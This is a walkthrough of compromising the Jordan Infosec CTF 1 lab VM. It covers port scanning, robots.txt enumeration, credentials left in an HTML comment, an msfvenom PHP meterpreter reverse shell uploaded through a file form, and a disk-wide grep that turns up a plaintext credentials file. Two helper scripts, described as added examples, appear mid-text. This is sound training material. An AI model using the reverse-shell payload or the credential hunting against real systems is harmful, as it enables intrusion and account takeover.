Jordan Infosec CTF 1 Boot to Root VM Walkthrough

Introduction

Sorry for the long delay in posting – life got a little busy over the past month or two. Today I’ll be posting my write-up of how to compromise the excellent Jordan Infosec CTF 1 VM created by @Banyrock.

This VM is more at the CTF end of the spectrum than a traditional Boot to Root, but that’s ok 🙂

Let’s get to it!

Host identification and Port Mapping

Let’s start by finding out which host on my network the VM lives on:

192.168.56.101 it is then 🙂 Let’s see what’s running on that host:

root@kali:~# nmap -sV -T5 -p- -sC 192.168.56.101 -n
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-20 14:06 BST
Nmap scan report for 192.168.56.101
Host is up (0.00056s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 af:b9:68:38:77:7c:40:f6:bf:98:09:ff:d9:5f:73:ec (RSA)
|   256 b9:df:60:1e:6d:6f:d7:f6:24:fd:ae:f8:e3:cf:16:ac (ECDSA)
|_  256 78:5a:95:bb:d5:bf:ad:cf:b2:f5:0f:c0:0c:af:f7:76 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 8 disallowed entries 
| / /backup /admin /admin_area /r00t /uploads 
|_/uploaded_files /flag
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Sign-Up/Login Form
|_Requested resource was login.php
MAC Address: 08:00:27:68:18:58 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.10 seconds
root@kali:~# 

Another tiny attack surface, then: SSH and an Apache server. A few interesting paths are disallowed in robots.txt, including a “/flag”. Sounds like our first flag!

HTTP Server

Navigating to the website’s homepage yields this form:

Nothing in the HTML gives anything away either, and the form isn’t vulnerable to SQLi and didn’t fold under a quick brute force. Let’s see what /robots.txt contains:

User-agent: *
Disallow: /
Disallow: /backup
Disallow: /admin
Disallow: /admin_area
Disallow: /r00t
Disallow: /uploads
Disallow: /uploaded_files
Disallow: /flag

Loads of interesting stuff here. Let’s go and take a look at /flag and hopefully get our first flag:

As expected, our first flag. Too easy! Now we manually enumerate all of the other endpoints referenced in the robots.txt file.

/backup, /admin, /r00t, /uploads all yield a 404 error, /uploaded_files yields a blank screen but /admin_area gives us something interesting in the HTML:
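The manual enumeration above is fine for eight paths, but it is worth scripting once so the same check can be reused on every box. The following is an added example, not part of the original write-up: it parses the Disallow entries out of a robots.txt (tolerating CRLF line endings, mixed case and trailing comments) and, when given a base URL, probes each path with curl and prints the HTTP status code. The embedded robots.txt is a constructed copy of the one shown above; the target URL is an assumption taken from this post's lab network.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): pull the Disallow entries out
# of a robots.txt and probe each path, reporting the HTTP status code.
# The sample robots.txt below is constructed for illustration.

# parse_disallow: read robots.txt text on stdin, print one path per line.
# Handles "Disallow:" in any case, CRLF line endings and trailing "# comments";
# skips empty Disallow lines (which mean "allow everything").
parse_disallow() {
    tr -d '\r' \
        | sed -n 's/^[[:space:]]*[Dd]isallow:[[:space:]]*\([^#]*\).*/\1/p' \
        | sed 's/[[:space:]]*$//' \
        | grep -v '^$' \
        | sort -u
}

# probe_paths BASE: read paths on stdin, request BASE+path and print "code path".
# BASE has no trailing slash, e.g. http://192.168.56.101 (needs network access).
probe_paths() {
    local base="$1" path code
    while IFS= read -r path; do
        code=$(curl -s -o /dev/null -w '%{http_code}' "${base}${path}")
        printf '%s %s\n' "$code" "$path"
    done
}

# Constructed copy of the robots.txt served by the VM.
SAMPLE_ROBOTS='User-agent: *
Disallow: /
Disallow: /backup
Disallow: /admin
Disallow: /admin_area
Disallow: /r00t
Disallow: /uploads
Disallow: /uploaded_files
Disallow: /flag
'

if [ -n "${1:-}" ]; then
    # Usage against a live target: ./robots_probe.sh http://192.168.56.101
    curl -s "$1/robots.txt" | parse_disallow | probe_paths "$1"
else
    # No target given: just show what the parser extracts from the sample.
    printf '%s' "$SAMPLE_ROBOTS" | parse_disallow
fi
```

A 404 from the probe only means the exact path is absent; /uploaded_files returning a blank 200 is still worth a directory-listing and file-upload check, as the rest of this walkthrough shows.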

<html>
<head>
<title>
Fake admin area :)
</title>
<body>
<center><h1>The admin area not work :) </h1></center>
<!--	username : admin
	password : 3v1l_H@ck3r
	The 2nd flag is : {7412574125871236547895214}
-->
</body>
</html>

How convenient… The credentials were hiding in an HTML comment, along with our second flag 🙂

Let’s chuck those credentials into the login page and start looking for our third flag.

Post-Login

After logging in we see a file upload page. Let’s see if we can upload a web shell and get our first shell on the box.

First step, create the shell:

root@kali:~/Downloads# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.56.102 LPORT=443 -f raw > shell.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 30304 bytes

Second step, upload the shell.

Third step, start the meterpreter listener.

Fourth step, navigate to /uploads

Fifth step, shell!

msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.102:443 
[*] Meterpreter session 1 opened (192.168.56.102:443 -> 192.168.56.101:57944) at 2018-05-20 14:50:36 +0100

meterpreter > sysinfo 
Computer    : Jordaninfosec-CTF01
OS          : Linux Jordaninfosec-CTF01 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64
Meterpreter : php/linux
meterpreter > 

Now’s the hard bit, escalating from where we are to root.

Privesc

With our new fancy shell, running “ls” in the root of the web directory shows a file named “hint.txt”. Catting that file yields this output:

try to find user technawi password to read the flag.txt file, you can find it in a hidden file ;)

The 3rd flag is : {7645110034526579012345670}

So that’s good news, we have another flag and a hint for where to find the next user!

After…50?… greps and finds where I tried to look only in hidden files, I eventually gave up and grep’d the entire disk for a file containing “technawi”:

grep -rnw --exclude-dir=proc --exclude-dir=sys 'technawi' / 2>/dev/null ; echo DONE
/etc/subgid:3:technawi:165536:65536
/etc/mysql/conf.d/credentials.txt:3:username : technawi
/etc/subuid:3:technawi:165536:65536
/etc/passwd:30:technawi:x:1000:1000:technawi,,,:/home/technawi:/bin/bash
/etc/group:5:adm:x:4:syslog,technawi
/etc/group:18:cdrom:x:24:technawi
/etc/group:21:sudo:x:27:technawi
/etc/group:23:dip:x:30:technawi
/etc/group:35:plugdev:x:46:technawi
/etc/group:49:lxd:x:110:technawi
/etc/group:54:technawi:x:1000:
/etc/group:55:lpadmin:x:115:technawi
/etc/group:56:sambashare:x:116:technawi

The /etc/mysql/conf.d/credentials.txt hit looks interesting! Not a hidden file though, so my initial attempts to only find hidden files didn’t work :@ Note also the /etc/group hits: technawi is a member of sudo (and lxd), so whatever password is in that file is effectively a root password on this box.
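The lesson from the fifty failed attempts is not to trust the hint's "hidden file" literally: search every readable file for the username, skip the pseudo-filesystems that make a recursive grep hang, and only then note which hits are dotfiles. The script below is an added example, not the author's command. It wraps that search in a function and builds a small constructed directory tree (mirroring the layout seen on the VM, with placeholder contents) so it can be exercised without the target; on the box itself you would call `hunt_user_refs technawi /`.

```shell
#!/usr/bin/env bash
# Added example (not the author's command): find every regular file under ROOT
# that mentions USER as a whole word, skipping pseudo-filesystems, and tag each
# hit as "hidden" (dotfile or under a dot-directory) or "plain".

# hunt_user_refs USER [ROOT]: prints "hidden|plain<TAB>path", sorted.
hunt_user_refs() {
    local user="$1" root="${2:-/}" f rel
    # -r recurse, -l names only, -w whole word, -I skip binaries.
    # --exclude-dir takes a basename glob: "proc", not "/proc".
    grep -rlwI --exclude-dir=proc --exclude-dir=sys \
               --exclude-dir=dev  --exclude-dir=run \
               -- "$user" "$root" 2>/dev/null \
    | while IFS= read -r f; do
        rel="${f#"$root"}"          # classify relative to ROOT, not the tmp path
        case "/$rel" in
            */.*) printf 'hidden\t%s\n' "$f" ;;
            *)    printf 'plain\t%s\n'  "$f" ;;
        esac
    done | sort
}

# make_sample_tree: build a throwaway tree with constructed data that mirrors
# the layout seen on the VM; prints the tree's root directory.
make_sample_tree() {
    local d
    d=$(mktemp -d)
    mkdir -p "$d/etc/mysql/conf.d" "$d/home/technawi" "$d/proc/1"
    printf 'username : technawi\npassword : <placeholder>\n' \
        > "$d/etc/mysql/conf.d/credentials.txt"          # plain file, the real hit
    printf 'technawi:x:1000:1000::/home/technawi:/bin/bash\n' > "$d/etc/passwd"
    printf 'technawi was here\n' > "$d/home/technawi/.bash_history"   # hidden file
    printf 'technawi\n' > "$d/proc/1/cmdline"            # under proc: must be skipped
    printf 'technawi2 is not a whole-word match\n' > "$d/home/technawi/notes"
    printf '%s' "$d"
}

# Self-check against the constructed tree (on a target: hunt_user_refs technawi /).
sample_root=$(make_sample_tree)
hunt_user_refs technawi "$sample_root"
rm -rf "$sample_root"
```

Expect three hits from the sample tree: the plain credentials.txt and passwd entries plus the hidden .bash_history, with the proc entry and the partial match in notes both absent. On a real host, run it as the lowest-privilege user you have; the interesting finding is usually a credentials file that is world-readable when it should not be, exactly as here.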

Credentials.txt contains:

cat /etc/mysql/conf.d/credentials.txt
The 4th flag is : {7845658974123568974185412}

username : technawi
password : 3vilH@ksor

Yey! Now we can ssh in and get the next (final?) flag!

After SSHing in as technawi and catting /var/www/html/flag.txt we get:

technawi@Jordaninfosec-CTF01:/var/www/html$ cat flag.txt 
The 5th flag is : {5473215946785213456975249}

Good job :)

You find 5 flags and got their points and finish the first scenario....

Done!

Conclusion

Great VM. Really good fun, quite straight forward to compromise. The hardest bit was finding technawi’s credentials, but it was worth the perseverance!
